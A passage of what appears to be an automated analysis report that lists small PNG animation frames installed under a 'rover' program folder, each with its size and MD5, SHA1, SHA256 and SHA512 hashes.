                                                                                                                                                          52a3d9746c77e5359cf082e6528406eddf3423524d8370dc7cb4d8944dcc1d935c1b20304277b4f9574beb05ab50706b9d513c97b84e5890fa8b91e40594e877

                                                                                                                                                        • C:\Program Files (x86)\rover\_3Idle\_3Idle.023.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          be62ccb6b6ea5445236b63fa0ab68da2

                                                                                                                                                          SHA1

                                                                                                                                                          aa4a12c77655341d198a8c271f20837961c2c40e

                                                                                                                                                          SHA256

                                                                                                                                                          e70f462b8088de12f28480bf9d1e165e4680905e7961ba36478900a9baddf5ab

                                                                                                                                                          SHA512

                                                                                                                                                          47a66938bc201aad65295e1f179d28f0a80ac712371f113d5610a0234f9be344c97778ca293977311dfebce94b8deabaddce9c20fbb8a2f22561dc1c1210a4db

                                                                                                                                                        • C:\Program Files (x86)\rover\_3Idle\_3Idle.024.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          c5c97d3fe9d3a56881f43f3dff64e5c8

                                                                                                                                                          SHA1

                                                                                                                                                          2db2b5cba82cb9aa55751ef311f494cfa94f86d4

                                                                                                                                                          SHA256

                                                                                                                                                          28cb3e3061d1815f64d7b76b3fec9fcc2610080cc5337f33601a7f1e32e059d8

                                                                                                                                                          SHA512

                                                                                                                                                          9d4afd739549da033bb0777198f90fc48b8c6cdafc844deed9a865b582ae7cce3a972989ff91c50af2efc9ee3fb3dcb39821a474ed59743ba017c612141f25ed

                                                                                                                                                        • C:\Program Files (x86)\rover\_3Idle\_3Idle.025.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          dca9b638176a1f9398ce1ee3b2a92b0b

                                                                                                                                                          SHA1

                                                                                                                                                          b86c690b89e210ab259bbd46f5ecc8eb7e327482

                                                                                                                                                          SHA256

                                                                                                                                                          b189be6f32dba47909b46fda1eeb1d12688cd7bddc5d6d95b497bfca754c65df

                                                                                                                                                          SHA512

                                                                                                                                                          6d0820e3f253f2b850f4805ddf4d7f5c4cfa42e506a1f5f820d55a6615da58cdf068e9005b89bebc0463fb0fce159c9a7874cf16cf1d1bcb4323fb71d9180d9b

                                                                                                                                                        • C:\Program Files (x86)\rover\_3Idle\_3Idle.026.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          e3b93dd5929b0413773ced71931895bc

                                                                                                                                                          SHA1

                                                                                                                                                          1a2e7afa94ad67fc6ee41f51619c4b90f49ee147

                                                                                                                                                          SHA256

                                                                                                                                                          873cddb339b33c8361acbe13ed760c90b5ffb302f689e495d1a68480570582c9

                                                                                                                                                          SHA512

                                                                                                                                                          9e80a3c09addc9332ff7dc7292afec65575e6da16287a6f1cc3bc6cf4af70ca0b2d62229d0a61eb39fa1e73fafa25733588226f2e93112c283d0c39881212918

                                                                                                                                                        • C:\Program Files (x86)\rover\_3Idle\_3Idle.027.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          9b985f50b36f1235d629be29538ff397

                                                                                                                                                          SHA1

                                                                                                                                                          5d33a3ed92bba2c766397789cf5837eda4ea3908

                                                                                                                                                          SHA256

                                                                                                                                                          cf4fd4838e6811d9e7a5f43bc63027cf5acdc459b615d88f195f95f4e2002eed

                                                                                                                                                          SHA512

                                                                                                                                                          ab7a7207e3bd6e87e8944640497db32560836c12cbda9e399d84744b99bcd99c40829d4e2bb5e8e1285d4e97c6c5a36c2e293642e495375b37b370eee29b2cbb

                                                                                                                                                        • C:\Program Files (x86)\rover\_4Idle\_4Idle.001.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          548a7cd20119229af5917127dc8bfc4c

                                                                                                                                                          SHA1

                                                                                                                                                          ea826c325d469bc2bb7fbce912861ea6bbd16e09

                                                                                                                                                          SHA256

                                                                                                                                                          accfcfdd4fbc6156336f1b29ef4709c0e63ba90d051df72ac67acf61ea51df54

                                                                                                                                                          SHA512

                                                                                                                                                          b488b1feeefea5dc866ac20d8d7d081baecbd118fd417c3ff86635ba26a42db9b2aa833c3a51b1dc8131e7f4af1577b2e41950e38bf6b874f136e8618a48819b

                                                                                                                                                        • C:\Program Files (x86)\rover\_4Idle\_4Idle.002.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          e9c727fcac82b0164caeb3aa2b4f0aa0

                                                                                                                                                          SHA1

                                                                                                                                                          3204a2452dd90141e1cb2e5bf7a3b9cfebc24f01

                                                                                                                                                          SHA256

                                                                                                                                                          bcca911b2b0ac3cdb4ab339a3c9ac599971e43c4a01a706103bdc2f3b94436ad

                                                                                                                                                          SHA512

                                                                                                                                                          8b188ea6ec3e8f01bd36ea5e6bc9c28af17bb63089e6857645bf88c2bbbae64c905e15b792ee3d8c726fb8314b91eb06b26ef429f16c980d8495a291e01d298d

                                                                                                                                                        • C:\Program Files (x86)\rover\_4Idle\_4Idle.003.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          5412302d00d480caf389844fa59bc2fd

                                                                                                                                                          SHA1

                                                                                                                                                          6a48abf623f119db6c010026fc1fea4185cbbd9d

                                                                                                                                                          SHA256

                                                                                                                                                          b6ecdcdf5887634b492066eb8fa6737148d260e58571d8028b2e2ee13b71e0a3

                                                                                                                                                          SHA512

                                                                                                                                                          6aefac4149c08efd9211c58fdf53ac60f2fac80b4542eb0e3dd485bfa47ec53127d6bff6db4e722ebb6ac2910a7afe359d4e4c30bc1e391df1a8b3c4baef6c22

                                                                                                                                                        • C:\Program Files (x86)\rover\_4Idle\_4Idle.004.png
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                          MD5

                                                                                                                                                          a7cb4cab07f48ecb17e225846171c319

                                                                                                                                                          SHA1

                                                                                                                                                          656b573f7e2e73fb7b83a00178aa86b58e7e9c33

                                                                                                                                                          SHA256

                                                                                                                                                          735cc1b9a36481b1ad6f41e06c45930c15e63b3ef3aa1ac6de7b0179e9bad207

                                                                                                                                                          SHA512

                                                                                                                                                          e9bc89e1f9aa9529b20a3ddc1a926f2399ee476e86ac2d8ea3f2e2bf1a81b3a1f61cce4f910c780b080b4b9237ee163f2bada83bc8e7a4a8477be07a3d6d3227

                                                                                                                                                        • C:\Program Files (x86)\rover\_4Idle\_4Idle.007.png
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                          MD5

                                                                                                                                                          887a3532db760bd0085babff4425e13e

                                                                                                                                                          SHA1

                                                                                                                                                          4084c43ac0ccf71d7bed0336a203deff813edf9d

                                                                                                                                                          SHA256

                                                                                                                                                          15b38c4d7b24f4f466c3208e6ff4091a5609c93ba248ec12c4c0e7c2b378a25e

                                                                                                                                                          SHA512

                                                                                                                                                          764307fa0a45258b49bdafe81d0b437109989670c9691fac8a247878c720a3738bd3cb8d91e821db7cae129a530cb51cf709d2bb70d61abf6deb6af3bdea88cd

                                                                                                                                                        • C:\Program Files (x86)\rover\_4Idle\_4Idle.008.png
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                          MD5

                                                                                                                                                          0841d3bcb107eee91806f53895981587

                                                                                                                                                          SHA1

                                                                                                                                                          ab4585766e333b7ecff4402006289f17a20f3d18

                                                                                                                                                          SHA256

                                                                                                                                                          903c9cc23f400fb365216958a17d9e65773253e9cb77445534aa5eb16bf29d70

                                                                                                                                                          SHA512

                                                                                                                                                          f9cd67d8cd247fe0df2d9b5ddb121f332e6dffca4e0f35503be1baf74927b9a38a8fcbf5baaaceaa23c4546c17e57ca53f6d8850650fcc92fb96cfb30558c59c

                                                                                                                                                        • C:\Program Files (x86)\rover\_4Idle\_4Idle.009.png
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                          MD5

                                                                                                                                                          15793b5a7f0ff0139b1c4eba881c5476

                                                                                                                                                          SHA1

                                                                                                                                                          b3c91d09441c6ac5d01708646ace8e6b844f8893

                                                                                                                                                          SHA256

                                                                                                                                                          f34fb037c9c38e9ecb1f8f58b7273703c905cc44f5a5157db6530c84ff7d2f8c

                                                                                                                                                          SHA512

                                                                                                                                                          78c81b06bc7c2bfdd965762bf5ccd588103603dfb8fd10cb91bcc5a7df1cf9f715a76f1fa533b150dbe200dedcb3a5d7bc49b8f3009c378e982f4aa4cb194006

                                                                                                                                                        • C:\Program Files (x86)\rover\_4Idle\_4Idle.010.png
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                          MD5

                                                                                                                                                          8ca8fdf0a710be3defa9fe7468a021ba

                                                                                                                                                          SHA1

                                                                                                                                                          49dd0344c667e00e880287d1b875b7dd60babd33

                                                                                                                                                          SHA256

                                                                                                                                                          1a74c70e760a01d394289a7bda109765d73e7832cb323a1faed5968dae070e15

                                                                                                                                                          SHA512

                                                                                                                                                          b30ce8644da803e9daae79cddd20a7019fe1e236cc4019c08c77b5a6d9937bab846896ecdb16f65cb512cfc758e4c43d053c5e7254ddb7d30c2e6e30b766ff36

                                                                                                                                                        • C:\Program Files (x86)\rover\_4Idle\_4Idle.011.png
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                          MD5

                                                                                                                                                          0e90bb350e1b26a52daa8dc48b939d35

                                                                                                                                                          SHA1

                                                                                                                                                          6516f0067d38921c4d1cd2907cffd0d4da278d24

                                                                                                                                                          SHA256

                                                                                                                                                          d81b340801073aee8adfe07387c53faf28f7ef1caeb9e317fc33d8d5eab0535a

                                                                                                                                                          SHA512

                                                                                                                                                          e40674985d1b7088518a609b78caac9713d194408cb5a947cbaac0dd577516e31712dac460d0c7b56cad0ff34cb478c0764af111617bf6f9632e4c76c5a48fb1

                                                                                                                                                        • C:\Program Files (x86)\rover\_5Idle\_5Idle.001.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          6d012de15d340fc705f72667d9bcfff2

                                                                                                                                                          SHA1

                                                                                                                                                          7f8f2b7d6e1f2e4039de10721eb081cb92dd6822

                                                                                                                                                          SHA256

                                                                                                                                                          d71496e723741d99633e2750a254c28234152d8f20ae81640d0c36047714dcbb

                                                                                                                                                          SHA512

                                                                                                                                                          08224b11bb1973a4c4e6986ddbc7158798789a28b10fafac80289861f7395d405c30ec7243d73c378a3100576c17ede8075fd4892aa553fa0b03760e4c7ee962

                                                                                                                                                        • C:\Program Files (x86)\rover\_5Idle\_5Idle.002.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          3417ec23d2d41d5b5b4015caa1586fb3

                                                                                                                                                          SHA1

                                                                                                                                                          123e52a2a36032ffa2d77b5de51c0a308a91a92c

                                                                                                                                                          SHA256

                                                                                                                                                          609a3d7253951d9aa5f70cc78d3d7fb8c41baa333d762c10dffea4a74ac1325c

                                                                                                                                                          SHA512

                                                                                                                                                          8f01cf840b029f6cfcc12fbdf8afc6ca4412a4e60790a83b8e3c69186c05171391cc56f6308ff0cbf1ce02eaad7ba95060f4dac538848b01889c8386757df746

                                                                                                                                                        • C:\Program Files (x86)\rover\_5Idle\_5Idle.003.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          abbe23174c1794b4e951f3dfa1f702ae

                                                                                                                                                          SHA1

                                                                                                                                                          ed31c4349a711d0a15d9a6a82615725369bf7f73

                                                                                                                                                          SHA256

                                                                                                                                                          4812b3215007efc588b7f1b1d6213afa4a76d5faf832a1f0f4a3fe50f70496f7

                                                                                                                                                          SHA512

                                                                                                                                                          5c870e281450614869d017af3e56c3f882e2d355b0e3976128907e71aafba3fc5ba3c4e14627d692cc8069024e5d23930a73952ca3b6444362a92177a857363d

                                                                                                                                                        • C:\Program Files (x86)\rover\_5Idle\_5Idle.004.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          f47534e2e91e1ecaaf7eb3cf5c692605

                                                                                                                                                          SHA1

                                                                                                                                                          7c8878c2b57ffaf1532a5a8debf095e53b7598e2

                                                                                                                                                          SHA256

                                                                                                                                                          954738dfaa18029e3e722f000d65cd4230c04cabc902af4b943cddd0613559fc

                                                                                                                                                          SHA512

                                                                                                                                                          92c74604c469d76931f08ca3238d4c22f913e0e4b7b6bb11e2f6dc117b31ed3698f04622508c4ef4509ab146e1ca297c935f396a0f53084ca561672cf01ec5e4

                                                                                                                                                        • C:\Program Files (x86)\rover\_5Idle\_5Idle.005.png
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                          MD5

                                                                                                                                                          03d511bdb82e4f6302c1144acda67569

                                                                                                                                                          SHA1

                                                                                                                                                          4866ecc58092afd7bd756e530d4d404c6e5cb7b8

                                                                                                                                                          SHA256

                                                                                                                                                          211a1f0fb688cc25c40d6b53d3d560ff530416d86e232532a61cc30dabbd2ca7

                                                                                                                                                          SHA512

                                                                                                                                                          587da0a57799d7cf1d5ee0716d4c00edd02d6ba576571692da9160c64a7507837917f486c0f2d1b97799578d67f3618310421e733a262d286dd29274e33e2f2f

                                                                                                                                                        • C:\Program Files (x86)\rover\_5Idle\_5Idle.006.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          2efdd2043acaaa7b5fdee6abd0d07a1c

                                                                                                                                                          SHA1

                                                                                                                                                          d9ee14afbcd393ae6c4aef0b6662b4fbd3703af5

                                                                                                                                                          SHA256

                                                                                                                                                          ea454f5ab78c879ef5c0426fbd79574a5113e23a8756475e27e417c4093079b7

                                                                                                                                                          SHA512

                                                                                                                                                          27dbdc951331cb7ce306326771c2373827b972f4310db9a70ad864dfa789c39281eca296e10bc1a79d471182babb6c3f7f135d1cf9fde7de790f224b43280e0d

                                                                                                                                                        • C:\Program Files (x86)\rover\_5Idle\_5Idle.007.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          e85dbd413bc479ec8069aed045641a10

                                                                                                                                                          SHA1

                                                                                                                                                          1198065ef7d37c3e12dc4fdad50390f5686a09ac

                                                                                                                                                          SHA256

                                                                                                                                                          1b8574f84b4c49f5860409c304250917f6dbeccc750a2246b73c0c2b49a2eddd

                                                                                                                                                          SHA512

                                                                                                                                                          1962cc6efe48d66636376fa439ea23b224359e7404370b1898515f0057025ab98acef61e66cd2b7328d5835db2ead4a77b724c8b50f93337e6ab2cd5f596de69

                                                                                                                                                        • C:\Program Files (x86)\rover\_5Idle\_5Idle.008.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          439567d7aa87eab3a6926d0f9f060439

                                                                                                                                                          SHA1

                                                                                                                                                          023c2121add6b66b7d87346ab930109e3708ef8f

                                                                                                                                                          SHA256

                                                                                                                                                          ea9505c901b67f30c03186f1ebd3b2753c6687251717d02aa2e0fdaff17b3e4f

                                                                                                                                                          SHA512

                                                                                                                                                          4a952738e17dd9f63da1054854c58f45441e3cbb88273fc1990a348c99eb3de2a105ecbe5f738f11f71d49ebef073f1a49f617ae74bc33627600072af27ccf45

                                                                                                                                                        • C:\Program Files (x86)\rover\_5Idle\_5Idle.009.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          1858aef1339eb49d88ddfafa7c30833b

                                                                                                                                                          SHA1

                                                                                                                                                          e5dd108dbbd81a50a930e5938e772df48c897938

                                                                                                                                                          SHA256

                                                                                                                                                          f629e309187d460093ab0d18a0c4295b57df8764aedc2d360bf427336be6b6e4

                                                                                                                                                          SHA512

                                                                                                                                                          d0a614ff03775e93fff34469eac8812bc03b6343048b4c3ac995c3640e9a25c995f7a7748b4dffdab3853796c290d9027e77c06ce27eb89ca22b72fe86c99b5f

                                                                                                                                                        • C:\Program Files (x86)\rover\_5Idle\_5Idle.010.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          caaaaf4297b6cd045d98662d010969a2

                                                                                                                                                          SHA1

                                                                                                                                                          6ae6fd6ea7e7d89a94fbb6320c6d1ea307c1626b

                                                                                                                                                          SHA256

                                                                                                                                                          85452b71a8e0752693af95bd7aa463a903b953f5a63007c675907b63380d1f3f

                                                                                                                                                          SHA512

                                                                                                                                                          7cd2c8dd11b31e252abd418572bb6ca0a38fdc28186fe7dea0365d71a708ce4d1cfe1d4efc518a366b1c9674bf5173eaa8c44c4e0f47c215ec727a20ec3aace8

                                                                                                                                                        • C:\Program Files (x86)\rover\_5Idle\_5Idle.011.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          effa423993959efa7b7326081c730178

                                                                                                                                                          SHA1

                                                                                                                                                          670eb86d4a4b6bb10984d1dd67d3e7a06043100f

                                                                                                                                                          SHA256

                                                                                                                                                          9dcb4a3ba3560260fe55b569accef3b0734c64b9a3d3f9ac133bfcfd750fbb53

                                                                                                                                                          SHA512

                                                                                                                                                          e9ed38dd94789330a9720ea4a54742acef9c2ceb7dec751de323910f64ac124cc671ae94ee70cdcc481b0b01ea5e3368b989aa041ae6232957327a97c6e0e03f

                                                                                                                                                        • C:\Program Files (x86)\rover\_5Idle\_5Idle.012.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          c45d768ff505ca41e4fba41a761e3d3a

                                                                                                                                                          SHA1

                                                                                                                                                          a0c715dd66728a367a16c2e950cb8407577b5a7f

                                                                                                                                                          SHA256

                                                                                                                                                          4ededc2033f874088938e7e5dc5ce079aa4f61190d604765e9377997861af300

                                                                                                                                                          SHA512

                                                                                                                                                          6f4194736650a8cc6922b14fbe76fbe3a11e8ff2fbcb425bcf949fc03dd3ef3fe18f01a6baa59275d1d9948444d0784a84e4b4a263fa03b26a4e12cce227ef2c

                                                                                                                                                        • C:\Program Files (x86)\rover\_5Idle\_5Idle.013.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          99ef087fbdd404124c5ec349098c1829

                                                                                                                                                          SHA1

                                                                                                                                                          aaaaf3f74ca80e1e82c457084c3781be89eedef7

                                                                                                                                                          SHA256

                                                                                                                                                          063c21724ecf35d9e4f36b6f0703b29bdae12dc55dd55f1303179c91baaae202

                                                                                                                                                          SHA512

                                                                                                                                                          bdcfcd024fb4d4b87ebce51074e5d34092ab27226f0497797a637a98eac779c86f765e9bc299e961bdc984e79998281ebd98957de395c1c5d34f58a4c277b3a2

                                                                                                                                                        • C:\Program Files (x86)\rover\_5Idle\_5Idle.014.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          d083400c4d4ed372a8cc58f3bd51fb49

                                                                                                                                                          SHA1

                                                                                                                                                          e617a1a8fc61774aa020d5747d4cc02c9589ab29

                                                                                                                                                          SHA256

                                                                                                                                                          aec2d3acf0eb98ced0e99bcc33400de665b0e7d20c44289d8fa7a3b15e466322

                                                                                                                                                          SHA512

                                                                                                                                                          d8012efadeded330fdf23b5bc401ff524a95c6031f1e1e6fcac73e67267bb04c7ddab21b47405aa68f29c0d2e24b427849ee97de9f1d08b5835fed435f0e2e2f

                                                                                                                                                        • C:\Program Files (x86)\rover\_5Idle\_5Idle.015.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          832fea7c280114cde344a1eb05ac6e38

                                                                                                                                                          SHA1

                                                                                                                                                          b7f6b883a2ba4f9207307437647ec177baa6e033

                                                                                                                                                          SHA256

                                                                                                                                                          353521010652584ff1c8d014cd633b214884ab6e989a93fd376862aa49e92bce

                                                                                                                                                          SHA512

                                                                                                                                                          f143643cceaf9e3a5b2bd0fe101972fd9be3a050a504c94964a057a1207ab7cc4a484c0c9100d845eb67e3b853331fe68b853407584c020d8a618a019792beb3

                                                                                                                                                        • C:\Program Files (x86)\rover\_5Idle\_5Idle.016.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          f6bc71acab3b5649ea7f6a80d307be98

                                                                                                                                                          SHA1

                                                                                                                                                          ba5ed99b86afac3e77b23c329bf0a4505e203ee6

                                                                                                                                                          SHA256

                                                                                                                                                          a8c905783760cd9fe436cecf9b3d41f737aedefe0389b5ae1a3621e5ad70ffbb

                                                                                                                                                          SHA512

                                                                                                                                                          d251fa010b87785e22817cb7d738677371637c7ce3ce52dd163f4e486e5a2a1a156c435cf2989a06519030b245abc1147257cfd2e7588d095861b6103e6319d1

                                                                                                                                                        • C:\Program Files (x86)\rover\_5Idle\_5Idle.017.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          8401c81a2786966921196322c7dc997b

                                                                                                                                                          SHA1

                                                                                                                                                          21bf190022bf9e5285ad33a1d9b9e8982dc6924b

                                                                                                                                                          SHA256

                                                                                                                                                          256d3f5fb7b1e693b39cdacdd3fcae49b960c6bf1c13c5722c446c0719023f12

                                                                                                                                                          SHA512

                                                                                                                                                          694046f1bfe9c761c203f03425d280b36510548dea09558dba0618289d3c3b72a66d019fc4349679331f77212aafb62342c912e54c883d5f8e383e88cf6f1a9d

                                                                                                                                                        • C:\Program Files (x86)\rover\_7Idle\_7Idle.001.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          c8bc903c2c7b9f685954a8eef5af9085

                                                                                                                                                          SHA1

                                                                                                                                                          6002bf9b7f1a4e1a0c4e51cf7ddcf8d3dafac6c5

                                                                                                                                                          SHA256

                                                                                                                                                          d932563e1866284b1ec359587a0a09446888073c08ffeb74e47cb9201cb82caa

                                                                                                                                                          SHA512

                                                                                                                                                          a80745e7db61c521d809dc2594edbf85cc68326ca97ec341b05fb0b9b7ef5424cd42d8eaf6d59f68d5e2509cb87743fd7f099c4e10876d2c5833c46f329285bd

                                                                                                                                                        • C:\Program Files (x86)\rover\_7Idle\_7Idle.002.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          933b77e7d78c888ed83cbec57ec9af74

                                                                                                                                                          SHA1

                                                                                                                                                          bcbc2203a4527771364ba80abaca976d9dec6dcd

                                                                                                                                                          SHA256

                                                                                                                                                          b682f615bdee802bda24fad31289d5b2e499b95f9e34a6d73e484bb410370c95

                                                                                                                                                          SHA512

                                                                                                                                                          db6bfeff8eb57b9deadc50ee0f3b50900eacbd7942f02d6bf7085804e69118041936039ff5bfe770ba9d61c260a5bdfb0dfba94654cabc521640add31a50acb4

                                                                                                                                                        • C:\Program Files (x86)\rover\_7Idle\_7Idle.003.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          6abacfd7cf98f988aa485817aa1a2867

                                                                                                                                                          SHA1

                                                                                                                                                          aa5fc9d904661268e846968cf2e0ca7231802d6d

                                                                                                                                                          SHA256

                                                                                                                                                          b44d0823c5f1d0d0dfd15cf71d0f69980e0344c97b1eb233d50f40fa8da34dde

                                                                                                                                                          SHA512

                                                                                                                                                          908a1904823f32dd41ae786eb6ec810b551043760a19d086596f3ea881faafd3151edee2d21408fcde633948acbb6735cabb10cdb0476247c7014d90da2fdd42

                                                                                                                                                        • C:\Program Files (x86)\rover\_7Idle\_7Idle.004.png
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                          MD5

                                                                                                                                                          0cd86ee33a81784f793d6e96c9bcc63e

                                                                                                                                                          SHA1

                                                                                                                                                          12757b47bcb94fa36c7d22f9fe53e7c413b459f5

                                                                                                                                                          SHA256

                                                                                                                                                          2f62410b43825bc12cd6ded7d8a7e5337cc0d4a27660950b3d9e604413cff756

                                                                                                                                                          SHA512

                                                                                                                                                          2526e383aaed211abaaa844529eecd66bc683127e6ac2e26b0b0958ea5f90064696030d255aa8de99ec17ae08fa1fafe1e019f368a811b569c4d20bdf4e8e863

                                                                                                                                                        • C:\Program Files (x86)\rover\_7Idle\_7Idle.005.png
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                          MD5

                                                                                                                                                          aee65bc6df4c8f4dc45cd203cfab8969

                                                                                                                                                          SHA1

                                                                                                                                                          8927eaeea46f1fe52ef290db809e17c518bb9317

                                                                                                                                                          SHA256

                                                                                                                                                          2ced4fc30d9a3f15edba34c94b0082cad1bb2a7d2a73310deb2378753ed68af5

                                                                                                                                                          SHA512

                                                                                                                                                          ba7e278d91f87d870603f742e6221d6c14a8c4bcd0abbb3abd20f0e88953d25f6d06558136c2dacffef878a5859f481d32bbd7d897bde450276c32cb79d81383

                                                                                                                                                        • C:\Program Files (x86)\rover\_7Idle\_7Idle.006.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          ccfc1a07c0a02a65d6bb0a4d5084f383

                                                                                                                                                          SHA1

                                                                                                                                                          112f27aad26d4321022360a7e831099225f68c70

                                                                                                                                                          SHA256

                                                                                                                                                          1298564b3e7af43cc1198ecf5894a477bbc444dd3f4c08eaf9583528e6ab185c

                                                                                                                                                          SHA512

                                                                                                                                                          9ae9c8d1d63e0cd6dec20db94ecdb6c064ce5914566c05e6ce1c26b0fb861ef104eae7542f13e099740a29bc23420a05a10cabdcc579e6212c9f4108178d41ea

                                                                                                                                                        • C:\Program Files (x86)\rover\_7Idle\_7Idle.007.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          d8fce6334d4b0173e3e04edecdfa8bf8

                                                                                                                                                          SHA1

                                                                                                                                                          79ac06e6e8307e7801e0555a73253eaac0f62e90

                                                                                                                                                          SHA256

                                                                                                                                                          2a552e3d154e627dbc75c620b7a3c9079eee343863be9add1cffffb4196e5763

                                                                                                                                                          SHA512

                                                                                                                                                          e4d0fcd2456d1bcb27f63eef2523d3b968041f2181730baa5c159e1215ef4253fc9bc762eb7412fa40aa3682bd7bdcd1dae47f66a114ae5b10ee0c7657e5c8c4

                                                                                                                                                        • C:\Program Files (x86)\rover\_7Idle\_7Idle.008.png
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                          MD5

                                                                                                                                                          8202eee8125946fd3fe9b9bdac6041a3

                                                                                                                                                          SHA1

                                                                                                                                                          f65284a69602a2364ef8aa1d53d1c9cd5c664058

                                                                                                                                                          SHA256

                                                                                                                                                          ba7da3be084abed034af32f708e074b0088bda3e0a021afd051f66507a0ad702

                                                                                                                                                          SHA512

                                                                                                                                                          59236a64020b0b0805cca07b1309050c36e6cf149da2915f5e4a99a71b6d508d029f5604fd9c0775511920aceef32e86c9100e40a1ed039ed7afef3f541acdc6

                                                                                                                                                        • C:\Program Files (x86)\rover\_7Idle\_7Idle.009.png
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                          MD5

                                                                                                                                                          b7096ce0bcaff56dfcefe080a17a0f80

                                                                                                                                                          SHA1

                                                                                                                                                          c1ebc67a00741121258a43be97d72759bf194d38

                                                                                                                                                          SHA256

                                                                                                                                                          efddfefba8cd24e23c1dcd20a201695f56e7ef37f228a6d77852f6b008412047

                                                                                                                                                          SHA512

                                                                                                                                                          4b064533557b6feb2f7016c31165d28bd74900a8fd06912817721c2c036314349b97f48c5bb914985881a309c1f79df8be004728f5793688b23dba3d871401a3

                                                                                                                                                        • C:\Program Files (x86)\rover\_7Idle\_7Idle.010.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          1e9d596b3ca8fcc93fc8dfefa9e529a1

                                                                                                                                                          SHA1

                                                                                                                                                          dada3d87a617afdac6a961bfa780d859f70aa8ad

                                                                                                                                                          SHA256

                                                                                                                                                          bcb3a8e283bb9877aebe72e456f0c5de7e3a929fec75e05c1563cfdfe799f807

                                                                                                                                                          SHA512

                                                                                                                                                          46952a207171efff9727c68bb8b3b566bebfbfff08c19467614d1077476bf0f0b3842dd9c56fbcae7a6f15da740f6cbf4160282ab7d44c9ad91e3e61b34f7b7b

                                                                                                                                                        • C:\Program Files (x86)\rover\_7Idle\_7Idle.011.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          5c3be185f9927d76df478b6af9f11034

                                                                                                                                                          SHA1

                                                                                                                                                          d5d0d258196308c4f100cf1b1cf06edbbef930af

                                                                                                                                                          SHA256

                                                                                                                                                          9c63402d1151cd016b945891c7845e16a87609e66737d1bd540130cea81349d7

                                                                                                                                                          SHA512

                                                                                                                                                          e214e9ef08040de4370174f9f9c7da9e99bff33ea3376c67c0205341b207dd4fb02b4c30dc69f45008719e1201db1781ebdac9c2a2b0818809e115daae533a8f

                                                                                                                                                        • C:\Program Files (x86)\rover\_7Idle\_7Idle.012.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          2a0c90afbbeb9e973333efa6a1509dd1

                                                                                                                                                          SHA1

                                                                                                                                                          d199a4f6e5dfcc917e04e71406c0cf5044a89c39

                                                                                                                                                          SHA256

                                                                                                                                                          125590c987f6462b03d612ed71e27453dbe126f12d6f34df611a6026bce7673a

                                                                                                                                                          SHA512

                                                                                                                                                          5e6f8e09e24d2250d6ba03bda55b53ae17c615b51fb0753383ffd1f1b522a2da79675f843e580c57e10d12e0511df6c82fdef43458f7081df94dba79f06c88d0

